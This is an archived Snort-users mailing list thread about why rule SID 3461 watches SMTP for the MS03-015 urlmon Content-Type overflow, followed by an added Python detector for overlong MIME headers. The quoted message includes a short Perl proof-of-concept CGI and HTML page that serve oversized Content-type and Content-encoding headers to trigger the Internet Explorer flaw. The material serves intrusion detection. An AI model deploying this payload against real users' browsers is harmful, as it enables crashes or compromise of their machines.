[Snort-users] SMTP Content-Type overflow attempt SID 3461

Alex Kirk alex.kirk at ...1935...
Mon Sep 26 09:39:12 EDT 2005


The rule looks for traffic on port 25 because it's possible to exploit 
this vulnerability via an HTML e-mail message (since Outlook uses IE to 
do HTML rendering). Rules for web-based attacks exist in the Community 
rules as SIDs 100000118 and 100000119.

Alex Kirk
Research Analyst
Sourcefire, Inc.

> I've seen the following alert triggered
>
> [**] [1:3461:2] SMTP Content-Type overflow attempt [**]
> [Classification: Attempted Administrator Privilege Gain] [Priority: 1] 
> 09/25-11:11:06.816693 x.y.z.1:35499 -> 192.168.1.10:25
> TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:2776
> ***AP*** Seq: 0xCE9CF6A4  Ack: 0xDEEA2DBD  Win: 0x40B0  TcpLen: 20
> [Xref => 
> http://www.microsoft.com/technet/security/bulletin/MS03-015.mspx][Xref 
> => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0113][Xref => 
> http://www.securityfocus.com/bid/7419]
>
> Yet the Microsoft fix is for Internet Explorer, while the signature
> looks for traffic on TCP port 25. I think the signature should look
> for this exploit on TCP port 80.
>
> Attached is the sample exploit, which would also only affect port 80.
> #!/usr/bin/perl
> #
> # Name this file as "urlmon-bo.cgi"
> #
> use strict;
> use warnings;
>
> # 300-byte header values, far longer than the vulnerable urlmon.dll
> # code expects for these headers.
> my $LONG = "A" x 300;
> print "Content-type: $LONG\r\n";
> print "Content-encoding: $LONG\r\n";
> print "\r\n";
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- -
> <html>
> <body>
> <img src="urlmon-bo.cgi">
> </body>
> </html>
>
>
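As an added illustration of the point in Alex's reply (this is example code written for this page, not code from the thread, from Sourcefire, or from the Snort rule itself): the same oversized Content-Type / Content-Encoding values that urlmon-bo.cgi serves over HTTP can be placed directly in an e-mail's own MIME headers, so a check over the SMTP DATA stream is meaningful even though the patched component is IE. The sample messages are constructed, and the 200-byte threshold, the function names and the handling of folded headers are assumptions made for the example, not details of SID 3461.

```python
import re

# Header-value length above which the check fires. Assumed for this example;
# it is not the threshold used by the real Snort rule.
THRESHOLD = 200

# Constructed sample messages, as they would appear in the SMTP DATA phase.
# None of these are taken from the original post.
BENIGN_MESSAGE = (
    b"From: alice@example.test\r\n"
    + b"To: bob@example.test\r\n"
    + b"Subject: hello\r\n"
    + b"MIME-Version: 1.0\r\n"
    + b'Content-Type: text/html; charset="iso-8859-1"\r\n'
    + b"\r\n"
    + b"<html><body>hi</body></html>\r\n"
)

# The same 300-byte values the urlmon-bo.cgi proof of concept emits, but
# carried in the e-mail's MIME headers instead of being fetched over HTTP.
LONG = b"A" * 300
SUSPECT_MESSAGE = (
    b"From: mallory@example.test\r\n"
    + b"To: bob@example.test\r\n"
    + b"MIME-Version: 1.0\r\n"
    + b"Content-Type: " + LONG + b"\r\n"
    + b"Content-Encoding: " + LONG + b"\r\n"
    + b"\r\n"
    + b"<html><body></body></html>\r\n"
)

# The same oversized value split across RFC 2822 continuation lines (lines
# starting with whitespace). A check that only looks at single physical
# lines would see three 100-byte fragments and miss it.
FOLDED_MESSAGE = (
    b"MIME-Version: 1.0\r\n"
    + b"Content-Type: " + b"A" * 100 + b"\r\n " + b"A" * 100 + b"\r\n " + b"A" * 100 + b"\r\n"
    + b"\r\n"
    + b"body\r\n"
)

# Matches the header name and everything up to the end of the logical line.
HEADER_RE = re.compile(
    rb"^(Content-(?:Type|Encoding)):[ \t]*(.*)$", re.IGNORECASE | re.MULTILINE
)


def unfold_headers(message: bytes) -> bytes:
    """Join folded header continuation lines into single logical lines."""
    return re.sub(rb"\r?\n[ \t]+", b" ", message)


def overlong_content_headers(message: bytes, threshold: int = THRESHOLD):
    """Return (header name, value length) for every Content-Type or
    Content-Encoding header whose unfolded value exceeds `threshold` bytes."""
    hits = []
    for m in HEADER_RE.finditer(unfold_headers(message)):
        name = m.group(1).decode("ascii").title()
        value = m.group(2).rstrip(b"\r")
        if len(value) > threshold:
            hits.append((name, len(value)))
    return hits


def should_alert(message: bytes, threshold: int = THRESHOLD) -> bool:
    """True when the message would trigger this example check."""
    return bool(overlong_content_headers(message, threshold))


if __name__ == "__main__":
    for label, msg in (("benign", BENIGN_MESSAGE),
                       ("suspect", SUSPECT_MESSAGE),
                       ("folded", FOLDED_MESSAGE)):
        print(label, should_alert(msg), overlong_content_headers(msg))
```

Like a plain content match, this does not parse MIME structure: it will also fire on body text that happens to begin a line with "Content-Type:", so treat it as the kind of signature you tune after looking at the traffic, not as a parser. The unfolding step is the part worth keeping: it is what stops a header split across continuation lines from slipping under the length threshold.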
